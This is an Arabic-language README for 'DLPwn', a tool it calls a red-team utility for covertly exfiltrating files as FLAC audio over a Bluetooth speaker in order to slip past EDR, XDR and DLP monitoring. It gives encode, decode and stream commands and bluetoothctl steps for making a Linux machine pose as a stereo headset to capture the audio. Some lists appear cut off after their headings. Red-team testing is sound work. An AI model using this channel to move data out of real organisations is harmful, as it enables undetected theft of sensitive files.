
أداة فريق أحمر (Red Team) لتسريب الملفات سراً عبر نقل الصوت بتقنية البلوتوث، حيث يتم تشفير البيانات الثنائية إلى إشارات FLAC لتجاوز أنظمة الأمان EDR وXDR وDLP.
منع تسرب البيانات عبر مكبر الصوت البلوتوث
DLPwn هي أداة للفريق الأحمر مصممة لتهريب الملفات لتجاوز أنظمة الأمان مثل EDR (كشف الاستجابة للنقاط الطرفية)، XDR (الكشف والاستجابة الموسعة)، DLP (منع تسرب البيانات)، وأي أنظمة معلومات معزولة عن الشبكة بشكل عام. تستخدم نقل الصوت عبر البلوتوث لتشفير الملفات التعسفية إلى إشارات صوتية بصيغة FLAC، ونقلها، وفك تشفيرها في الطرف الآخر، مستغلة حقيقة أن ضوابط أمان الصوت غالبًا ما تكون أقل تشددًا من تلك الموجودة على الشبكات أو الملفات.
يعمل DLPwn في ثلاث خطوات رئيسية:
يسمح هذا النهج بتهريب البيانات الحساسة دون إطلاق تنبيهات من أنظمة الأمان التي تراقب اتصالات الشبكة، أو عمليات الكتابة على القرص، أو العمليات المشبوهة.
يستخدم DLPwn بروتوكول نقل صوتي يعتمد على:
يتم تجزئة كل ملف إلى إطارات تصل إلى 212 بايت، مع إطار بيانات وصفية يحتوي على اسم الملف.
يتضمن DLPwn نظام مقاييس جودة الخدمة لتقييم جودة النقل:
يسمح هذا بتحسين معلمات النقل (معدل الباود، عدد النغمات) بناءً على ظروف الصوت.
pip install -r requirements.txt
python main.py encode myfile.bin --output transmission.flac
قم بتشغيل FLAC على مكبر صوت بلوتوث، ثم قم بالالتقاط على جهاز آخر:
python main.py bluetooth --filename capture.flac
ملاحظة: إعداد البلوتوث (لينكس فقط)
يعمل الأمر bluetooth فقط على أنظمة لينكس التي تستخدم PulseAudio أو PipeWire لالتقاط الصوت عبر البلوتوث. لكي يتم التعرف على الحاسب كسماعة بلوتوث بواسطة الجهاز المصدر:
قم بتثبيت bluetoothctl إذا لزم الأمر:
sudo apt install bluez-tools
قم بتشغيل bluetoothctl وقم بتعيين ClassID لتقليد سماعة رأس صوتية:
bluetoothctl
> power on
> discoverable on
> pairable on
> class 0x240404 # فئة سماعة رأس ستيريو
> quit
يسمح هذا للجهاز المصدر (هاتف، حاسب) بالاتصال بالحاسب كسماعة بلوتوث، مما يتيح التقاط الصوت عبر PulseAudio.
أو للالتقاط المباشر:
python main.py decode --loopback --duration 35 --output recovered.bin
python main.py decode --input capture.flac --output recovered.bin
للتشغيل والالتقاط وفك التشفير في أمر واحد:
python main.py stream transmission.flac --output recovered.bin
--baud: معدل الرمز (الافتراضي 1500).--m: عدد نغمات FSK (2، 4، أو 8).--rs-nsym: بايتات التكافؤ RS (الافتراضي 32).--f0, --f1: الترددات الأساسية.لتحليل ملف الإرسال:
python diagnose.py transmission.flac
في سيناريو الفريق الأحمر، يتيح DLPwn:
تحذير: استخدم فقط في بيئات مصرح بها. يمكن اكتشاف النقل الصوتي بواسطة الكاميرات أو الميكروفونات المحيطة.